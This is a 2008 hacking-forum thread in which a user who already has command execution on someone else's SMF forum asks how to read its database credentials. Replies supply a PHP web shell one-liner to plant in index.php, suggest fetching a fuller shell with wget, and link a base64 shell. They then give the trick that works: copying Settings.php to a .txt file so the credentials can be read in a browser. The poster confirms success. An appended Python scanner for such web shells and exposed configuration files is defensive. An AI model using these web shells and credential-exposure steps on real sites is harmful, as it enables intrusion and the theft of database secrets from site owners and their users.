Php-Injection: Can't find config files

Posted: Tue Dec 09, 2008 7:11 pm
-AO- | Advanced user | Joined: Jul 15, 2008 | Posts: 205 | Location: United States

I've got a shell with system()... The site has an SMF forum and normally there is a configuration file called Settings.php that has the db user and pass; I found this by dl'ing the source. So you would think this:
Code:
<? @system("ls /blah/blah/forum/"); ?>
It's there... so
Code:
<? @system("cat /blah/blah/forum/Settings.php"); ?>
but this file is showing up empty... So I don't understand where the db connection is made. I also tried this:
Code:
<? @system("find / -name '*.conf*'"); ?>
and
<? @system("find / -name '*Settings*'"); ?>
No success finding the db connection.
Any ideas?

Posted: Tue Dec 09, 2008 7:33 pm
capt | Advanced user | Joined: Nov 04, 2008 | Posts: 232

prolly it's chmod permissions, or system() commands are disabled for that user.
Try a better code, use this...
btw I'm guessing ur editing the code in the index.php file from the admin theme manager.
Code:
<?php
if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}
?>
using this...
ex. http://somesite.com/index.php?lol=command (like wget, cat, ls -la, etc)

Posted: Tue Dec 09, 2008 7:56 pm
pexli | Valuable expert | Joined: May 24, 2007 | Posts: 665 | Location: Bulgaria

Look in the source of login.php.

Posted: Tue Dec 09, 2008 8:47 pm
-AO- | Advanced user | Joined: Jul 15, 2008 | Posts: 205 | Location: United States

@capt
I'm not having a problem with system() function. My code is working fine but thanks for the reply.
@Pexli
Thanks, I will try login.php

Posted: Tue Dec 09, 2008 10:55 pm
capt | Advanced user | Joined: Nov 04, 2008 | Posts: 232

Have u tried wgetting a php shell then? Be easier to read and have much more control over what you wanna do.

Posted: Tue Dec 09, 2008 11:30 pm
-AO- | Advanced user | Joined: Jul 15, 2008 | Posts: 205 | Location: United States

I'm not able to check to see if login.php will work because the credentials for the login aren't on this PC.
I did upload a b64 shell and it crashed the forum and was put back up later in the day. Not sure why this happened but I don't want it to happen again.
http://thedefaced.org/shells/b64.txt

Posted: Tue Dec 09, 2008 11:59 pm
capt | Advanced user | Joined: Nov 04, 2008 | Posts: 232

Do you have msn? I could help you upload a working shell and you can get what you want.
Add me if you would like: sir_boxhead@hotmail.com

Posted: Wed Dec 10, 2008 5:04 am
-AO- | Advanced user | Joined: Jul 15, 2008 | Posts: 205 | Location: United States

@Pexli
This looks to be useful in LogInOut.php
Code:
$context['default_username'] = &$_REQUEST['u'];
$context['default_password'] = '';
I see it in the source of SMF but not in the one on the server.
Where is this db connection made?

Posted: Wed Dec 10, 2008 5:57 am
pexli | Valuable expert | Joined: May 24, 2007 | Posts: 665 | Location: Bulgaria

Try to read files like that:
<? @readfile('/bla/bla/bla/file.php'); ?>

Posted: Wed Dec 10, 2008 6:28 am
-AO- | Advanced user | Joined: Jul 15, 2008 | Posts: 205 | Location: United States

@Pexli
Thanks for reply. I'm getting the same output with readfile() as cat in system()
This is the code at the top of the page:
Code:
'\'' . $user_settings['passwordSalt'] . '\'')); setLoginCookie($timeout - time(), $ID_MEMBER, sha1($user_settings['passwd']
So this part of the source seems to be missing or deleted?
Code:
$context['page_title'] = $txt[34];
$context['default_username'] = &$_REQUEST['u'];
$context['default_password'] = '';
$context['never_expire'] = false;

Posted: Wed Dec 10, 2008 10:49 am
pexli | Valuable expert | Joined: May 24, 2007 | Posts: 665 | Location: Bulgaria

How about a listing of all files and dirs?

Posted: Thu Dec 11, 2008 1:49 am
-AO- | Advanced user | Joined: Jul 15, 2008 | Posts: 205 | Location: United States

I did this with "ls -lR" and I see everything in blah/blah/blah/forum/. Is this what you mean?

Posted: Thu Dec 11, 2008 8:43 am
pexli | Valuable expert | Joined: May 24, 2007 | Posts: 665 | Location: Bulgaria

-AO- wrote: I did this with "ls -lR" and I see everything in blah/blah/blah/forum/. Is this what you mean?

cp /bla/bla/bla/forum/Settings.php /bla/bla/bla/forum/somefile.txt
...and read settings via browser http://forum.com/forum/somefile.txt

Posted: Thu Dec 11, 2008 10:11 am
-AO- | Advanced user | Joined: Jul 15, 2008 | Posts: 205 | Location: United States

Code:
cp /bla/bla/bla/forum/Settings.php /bla/bla/bla/forum/somefile.txt
This worked, I can read the copied Settings.php file. Must have been some protection from reading it.
Thanks a lot pexli

Posted: Thu Dec 11, 2008 11:19 am
pexli | Valuable expert | Joined: May 24, 2007 | Posts: 665 | Location: Bulgaria

-AO- wrote:
Code:
cp /bla/bla/bla/forum/Settings.php /bla/bla/bla/forum/somefile.txt
This worked, I can read the copied Settings.php file. Must have been some protection from reading it.
Thanks a lot pexli

Good luck dude.
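
Added example, not part of the thread or written by any of its participants: a defender-side scan of a web root for the two artefacts this thread leaves behind, a PHP file that passes request input to a command-execution function and a copy of PHP source (here SMF-style settings) in a file the server returns as plain text. The function names, finding labels, extension set and sample file contents are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Command-execution call fed directly by request input (the thread's one-liner).
EXEC_ON_INPUT = re.compile(
    rb"\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\(\s*"
    rb"\$_(GET|POST|REQUEST|COOKIE)\b"
)
PHP_EXTS = {".php", ".phtml", ".php5"}  # assumed: extensions run by PHP
# PHP source or SMF-style DB settings sitting in a statically served file.
SOURCE_MARKERS = re.compile(rb"<\?php|\$db_passwd\s*=")


def scan_webroot(root):
    """Return sorted (relative_path, finding) tuples for files under root."""
    findings = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        try:
            data = path.read_bytes()[:1_000_000]  # inspect first 1 MB only
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        rel = path.relative_to(root).as_posix()
        if path.suffix.lower() in PHP_EXTS:
            if EXEC_ON_INPUT.search(data):
                findings.append((rel, "exec-on-request-input"))
        elif SOURCE_MARKERS.search(data):
            # Not handed to PHP, so the server returns the source as text.
            findings.append((rel, "php-source-in-static-file"))
    return sorted(findings)


def demo():
    """Scan a constructed sample tree (all file contents are made up)."""
    settings = b"<?php\n$db_user = 'u';\n$db_passwd = 'x';\n?>"
    samples = {
        "Settings.php": settings,   # normal config, executed by PHP
        "somefile.txt": settings,   # same content copied to a .txt
        "index.php": b"<?php if(isset($_GET['c'])){system($_GET['c']);} ?>",
        "readme.txt": b"Forum install notes.",  # negative control
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            Path(root, name).write_bytes(body)
        return scan_webroot(root)


if __name__ == "__main__":
    print(demo())
```

Findings from a real document root need a baseline first, since legitimate admin tooling and documentation can also match these patterns.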